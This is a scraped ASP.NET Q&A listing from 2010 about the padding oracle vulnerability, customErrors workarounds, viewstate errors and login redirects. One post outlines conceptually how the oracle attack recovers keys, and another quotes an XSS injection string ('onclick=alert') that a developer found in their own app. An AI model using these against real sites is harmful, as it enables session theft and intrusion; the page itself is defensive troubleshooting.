Security Vulnerability (Cryptographic Oracles) - Why Html Redirect For Pre 3.5 SP1
Sep 21, 2010
Why does the recent ASP.NET security vurnerability specify an html error page to redirect to pre ASP.NET 3.5 SP1 but an aspx page for later versions?
View 1 Replies
Similar Messages:
Sep 20, 2010
Just reading about this ASP.NET security vurnerability. Just wondering if this could be used to attack a WCF service hosted under IIS to get to its web.config or if its a pure ASP.NET vurnerability
View 3 Replies
Sep 23, 2010
This question is somewhat of a follow up to How serious is this new ASP.NET security vulnerability and how can I workaround it? So if my question seems to be broken read over this question and its accepted solution first and then take that into the context of my question.Can someone explain why returning the same error page and same status code for custom errors matters? I find this to be immaterial especially if this is advocated as part of the work around to it.Isn't it just as easy for the script/application to execute this attack and not specifically care whether or not it gets a http status code and more on the outcome? Ie doing this 4000 times you get redirected to an error page where on 4001 you stay on the same page because it didn't invalidate the padding?
I see why adding the delay to the error page is somewhat relevant but doesn't this also just add another layer to fool the script into thinking the site is an invalid target?What could be done to prevent this if the script takes into account that since the site is asp.net it's running the AES encryption that it ignores the timing of error pages and watches the redirection or lack of redirection as the response vector? If a script does this will that mean there's NO WAY to stop it?Edit: I accept the timing attack reduction but the error page part is what really seems bogus. This attack vector puts their data into viewstate. There's only 2 cases. Pass. Fail.
Either Fail, they're on a page and the viewstate does not contain their data. No matter what you do here there is no way to remove the fail case because the page just will never contain their inserted data unless they successfully cracked the key. This is why I can't justify the custom errors usage having ANY EFFECT AT ALL.Or Pass, they're on a page and the viewstate contains their inserted data.Summary of this vulnerability
The cipher key from the WebResoure.axd / ScriptResource.axd is taken and the first guess of the validation key is used to generate a value of potential key with the ciphered text.This value is passed to the WebResource.axd / ScriptResource.axd at this point if the decryption key was guessed correctly their response will be accepted but since the data is garbage that it's looking for the WebResource.axd / ScriptResource.axd will return a 404 error.If the decryption key was not successfully guessed it will get a 500 error for the padding invalid exception. At this point the attack application knows to increment the potential decryption key value and try again repeating until it finds the first successful 404 from the WebResource.axd / ScriptResource.axd
View 4 Replies
Jan 5, 2011
2nd in an occasional series:
Here's the first one
Is CAT.NET correct that the following is a genuine vulnerability in ASP.NET or is it a false positive?
var myInt = Int32.Parse(txtUserInput.Text);
Response.Redirect(string.Format("myPage.aspx?myId={0}", myInt);
CAT.NET is reporting this as a redirect vulnerability needing remediation via encoding myInt.
View 3 Replies
Mar 11, 2010
i am trying to create a strong name for assembly.....by giving the below code----
assembly:
AssemblyDelaySign(false)]
assembly:
AssemblyKeyFile(@"UsersABCDocumentsVisual Studio 2008Projectscodeaccesssecuritycodeaccesssecurity�inDebugABC.snk")]
assembly:
AssemblyKeyName("")]
when i am compiling project i am getting this error........
Error 1 Cryptographic failure while signing assembly 'C:UsersABCDocumentsVisual Studio 2008ProjectscodeaccesssecuritycodeaccesssecurityobjReleasecodeaccesssecurity.exe' -- 'Error reading key file 'UsersABCDocumentsVisual Studio 2008Projectscodeaccesssecuritycodeaccesssecurity�inDebugABC.snk'
-- The system cannot find the path specified. '
View 1 Replies
Sep 20, 2010
In Scott Guthries blog on the ASP.NET Security vulnerability noted here he says that for ASP.NET 3.5 SP1+ the following attribute should be set in the custom errors section
redirectMode="ResponseRewrite"
What is the significance of this in relation to the vulnerability and why only 3.5 SP1 and above?
View 2 Replies
Sep 15, 2010
I've just read on the net about a newly discovered security vulnerability in ASP.NET. You can read the details here. The problem lies in the way that ASP.NET implements the AES encryption algorithm to protect the integrity of the cookies these applications generate to store information during user sessions.This is a bit vague, but here is a more frightening part: The first stage of the attack takes a few thousand requests, but once it succeeds and the attacker gets the secret keys, it's totally stealthy.The cryptographic knowledge required is very basic.
All in all, I'm not familiar enough with the security/cryptograpy subject to know if this is really that serious.So, should all ASP.NET developers fear this technique that can own any ASP.NET website in seconds or what?How does this issue affect the average ASP.NET developer? Does it affect us at all?
In real life, what are the consequences of this vulnerability? And, finally: is there some workaround that prevents this vulnerability?EDIT: I'd like to summarize the responses I got so far.So, this is basically a "padding oracle" type of attack. @Sri provided a great explanation about what does this type of attack mean. Here is a shocking video about the issue!About the seriousness of this vulnerability: Yes, it is indeed serious. It lets the attacker to get to know the machine key of an application. Thus, he can do some very unwanted things.
In posession of the app's machine key, the attacker can decrypt authentication cookies.
Even worse than that, he can generate authentication cookies with the name of any user. Thus, he can appear as anyone on the site. The application is unable to differentiate between you or the hacker who generated an authentication cookie with your name for himself.It also lets him to decrypt (and also generate) session cookies, although this is not as dangerous as the previous one.Not so serious: He can decrypt the encrypted ViewState of pages. (If you use ViewState to store confidental data, you shouldn't do this anyways!)Quite unexpected: With the knowledge of the machine key, the attacker can download any arbitrary file from your web application, even those that normally can't be downloaded! (Including Web.Config, etc.)
Here is a bunch of good practices I got that don't solve the issue but help improve the general security of a web application.You can encrypt sensitive data with Protected Configuration Use HTTP Only cookies Prevent DoS attacksNow, let's focus on this issue.Scott Guthrie published an entry about it on his blogScottGu's FAQ blog post about the vulnerabilityScottGu's update on the vulnerabilityMicrosoft has a security advisory about itUnderstanding the vulnerabilityAdditional information about the vulnerabilityhe solutionEnable customErrors and make a single error page to which all errors are redirected. Yes, even 404s.
ScottGu said that differentiating between 404s and 500s are essential for this attack.) Also, into your Application_Error or Error.aspx put some code that makes a random delay. (Generate a random number, and use Thread.Sleep to sleep for that long.) This will make it impossible for the attacker to decide what exactly happened on your server.Some people recommended switching back to 3DES. In theory, if you don't use AES, you don't encounter the security weakness in the AES implementation. As it turns out, this is not recommended at all.Some other
View 12 Replies
Sep 29, 2010
Since installing the security patch for the ASP.NET Oracle Padding vunerability any user that was keeping themselves logged in to our site is getting error messages when hitting any page.
The errors logged on the server are
System.Web.UI.ViewStateException: Invalid viewstate.
Client IP: xxx.xxx.xxx.xxx
Port: 55796
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
ViewState: l4nsXEvWcOwlDpmdbxw916bpHoPiqdBP7Syb+zCQAv44xv/r3oLtETKTL28/Gts6
Referer: Path: /product/4795/fender-usa-deluxe-stratocaster-mn-olympic-white-pearl
With custom errors switched off a user sees the following information
Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.
Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
Stack Trace: [ViewStateException: Invalid viewstate.
Client IP: xxx.xxx.xxx.xxx
Port: 3588
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
ViewState: s0toPCu7bxkB7a3G+KTxawY3ILf1qunZyIqNBKg8xSoqY2BkWIUCJAHKFKo2RnJw
Referer:
Path: /]
[HttpException (0x80004005): Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.]
System.Web.UI.ViewStateException.ThrowError(Exception inner, String persistedState, String errorPageMessage, Boolean macValidationError) +118
System.Web.UI.ViewStateException.ThrowMacValidationError(Exception inner, String persistedState) +13
System.Web.UI.ObjectStateFormatter.Deserialize(String inputString) +238
System.Web.UI.ObjectStateFormatter.System.Web.UI.IStateFormatter.Deserialize(String serializedState) +5
System.Web.Mvc.AntiForgeryDataSerializer.Deserialize(String serializedToken) +90
to delete all cookies and log back in, but obviously an average user, won't know to do this and I'm worried they will just think our site is broken.
View 3 Replies
Apr 16, 2010
my application is running under asp.net 2.0 and in iis 5.0 (Windows XP) in my machine.config, i have the following setting
[code]...
whenever i go to my default.aspx page, it seems it doesn't redirect to login.aspx.
View 5 Replies
Dec 2, 2010
We have developed a small method that pulls a cryptographic key from a signed xml document and then checks the signature using the SignedXml.CheckSignature method.
When run from a command line app the key validates properly. However as soon as I call it from a web app it stops working. Anybody know what could be happening?:
// Verify the signature of an XML file against an asymmetric
// algorithm and return the result.XmlDocument Doc, RSA Key
public static Boolean VerifyLicenceFile(string xmlLicFilePathArg)
{
bool isVerified = false;....
View 1 Replies
Mar 25, 2010
We recently discovered that our web app was vulnerable to cross site scripting (XSS) attacks. We managed to manipulate our inputs to produce the following HTML:
[Code]....
Which executes an alert window when clicked.
After HTMLEncoding using the AntiXSS the web app successfully encodes the output to look like this:
<a href="javascript:__doPostBack('ctl00$ContentPlaceHolder1$CtlSearchList1$CtlListView1$DataGrid1$ctl03$ctl00','')">'); onclick=alert('This
is an XSS vulernability. An attacker could do anything here (redirect to another website, virus etc)');('.txt</a>
but the alert window still fires! What am I doing wrong?
View 3 Replies
Feb 25, 2011
Our asp.net 2.0 app encountered the following error:
This implementation is not part of the Windows Platform FIPS validated cryptographic algorithms.After adding the following in web.config -> <system.web> section:
<machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps" validation="3DES" decryption="3DES"/>
The error occurs in those pages that uses AJAX.
View 1 Replies
Jan 17, 2010
How can i redirect the Output of a View to html or string or PDF?
[Code]....
I whant to redirect that action to a pdf but all code i have found is on c# and i cant get it to work.
View 3 Replies
Jan 22, 2011
I am struggling a little creating a basic redirect page in ASP.Net but ensure the HTML is loaded first.I tried putting Response.Redirect in the page load event but that fires before the HTML is fully loaded. Been trying to use a timer but just not doing anything.I need the HTML to load before the redirect occurs is I have a statcounter script installed to log the visit before it redirects of my site.
View 4 Replies
Mar 22, 2011
I'm using Session to pass data from one page to another. The data contains HTML and when I display it in the other page, I see that it's different. This is how I put data in Session:
Session["omschrijving"] = Server.UrlEncode(lblOmschrijving.Text);
ftbOmschrijving.Text = (string)Session["omschrijving"];
View 5 Replies
Dec 24, 2010
I have a problem with trying to make some redirections from an old HTML page which was reading some parameters from the URL to feed some flash components to a new ASPX page.
The issue is that the page URLs are of the form: [URL] and that needs to redirect to something like: [URL]
There are several different values following the # but in essence they are all the same html page. Other problem is that the values are not even passed in a query string.
I'm using Windows Server 2008, IIS 7 (not R2) and I have installed the URL Rewrite module but so far my rules have not worked.
View 1 Replies
Oct 29, 2010
Considering the recent ASP.NET vulnerability, what should I look for in my httphandlers that would cause such a Padding Oracle vulnerability?
Asked in another way... what did MSFT do wrong and what did they fix in their handlers?
View 2 Replies
Jan 7, 2010
I have a login page. Once a user is authenticated they are redirected to another page, (called pg2). I don't want just anyone typing in the url and getting to pg2. If they are not authenticated I want them to redirect to login.aspx. To achieve this, I'm using this code below. But it's not working. I am using a nested master page and I don't know if this is causing the problem.
[Code]....
View 9 Replies
Feb 2, 2010
I am using ASP.Net's forms authentication, but do not want the default behavior of redirecting to a login page when a restricted area is accessed. Instead I would like to invoke a javascript JQuery dialog for the login on the current page, preventing the content behind from loading.My only issue is that by default the forms authentication wants to redirect. Is there a handler that I can hook into, or some other option to prevent the redirect?
View 3 Replies
Jan 12, 2010
I have a problem....if one user try to go to a page where he isn't autorized, the application rediredt he at the login page...
how I can redirect in an other page, where i write "Access denied"??
View 2 Replies
Jul 6, 2010
Ok, I have been trying with this for many days now and read countless posts on this subject but I still cannot get it working.
I have created 2 roles and memberships one for admin and one for users, as you can guess I want to direct admins to a admin page and users to a user page. When a user logs on, it works fine, whether it's an admin or user, but they both present the home page, default.aspx
I know you have to have a redirecturl, to direct the user to the relevant page, either admin or user, but where and which webconfig would you put this in? I have seen in some post that you need a protected void or a role line in a webconfig file, but I have tried both these and countless other bits of code in different webconfig files. Before you ask about validation, I know this works as the user can log in, but just wont go to the relevant page.
Directorty structue I have is as follows:
Account folder contains - ChangePassword.aspx, ChangePasswordSuccess.aspx, Login.aspx, Register.aspx, Web.config
Webconfig contains
[Code]....
Admin folder contains - default.aspx, Web.config
webconfig contains
[Code]....
Registered folder contains - default.aspx, Web.config
webconfig contains
[Code]....
View 17 Replies
Mar 10, 2010
I am currently having a spot of bother in something im trying to create. I want it so when a user who is in a certain role logs in they are directed to a certain page, and any other normal users are directed to another page.
I think i have this sorted via code but...
-The first time it will work, the 'admin' user will get directed to the appropriate page
-I then log out and log in as a normal user and get directed to the appropriate page
-then when i log out of that users account and back into the admin one i get directed to the normal users page instead.
-additional to this, I tried it on a different machine logging in as the admin user only to be redirected to the normal users page (is my session being stored somewhere?)
Ive traced through the problem and the user name and password being subbmitted are what they should be, yet it skips the true part of my IF statement for being in that role.
Here is my code I am using on the login form:
[Code]....
-When stepping through if seen it work and not work with the same values, I cant understand the logic of its inconsistency
the code i am using for the logout is (this is on my masterpage):
[Code]....
View 4 Replies
Mar 24, 2010
I'm no programmer. I am a student majoring in Business Information Systems. My capstone course requires me to develop a web-enabled database that will allow a company to track their projects. I have set it up this far using the 3.5 dynamic data page. My database is fine, however I need to set it up so that Admins can view the entire site and have the ability to edit, view, and delete items, and where users can only edit projects that they are assigned. Is what I'm looking to do possible?
View 4 Replies
Feb 1, 2010
I have the following web.config file in my MemberPages directory:
<configuration>
<system.web>
<authorization>
<allow roles="member" />
<deny users="*" />
</authorization>
</system.web>
</configuration>
If the User is a "member", he/she is allowed access to web pages in the MemberPages directory. Otherwise, he/she is denied access. The mechanism works. However, when the User is denied access, the following very unfriendly message appears:
Server Error in '/MyWebSite' Application.
The resource cannot be found.
Description: HTTP 404. The resource you are looking for (or one of its dependencies)could have been removed, had its name changed, or is temporarily unavailable. the following URL and make sure that it is spelled correctly.
Requested URL: /MyWebSite/MemberPages/member_page.aspx
How can I redirect the User to a more friendly page if he/she is denied access?
<configuration>
View 2 Replies
Apr 26, 2010
I have a Menu with various Web Pages, as I click to nagivate from one Page to a nother, at random but not often, when I click on to open a Page it took me back to my Login page where user must enter the Name and Password again it then open the page else it doesn't do anything and stay on the login screen. This doesn't occur on my local development test.
On my Pages' Page_Load event I have this code
If
Not
Me.User.Identity.IsAuthenticated
Then
Response.Redirect("~/Login.aspx")
End
If
View 7 Replies
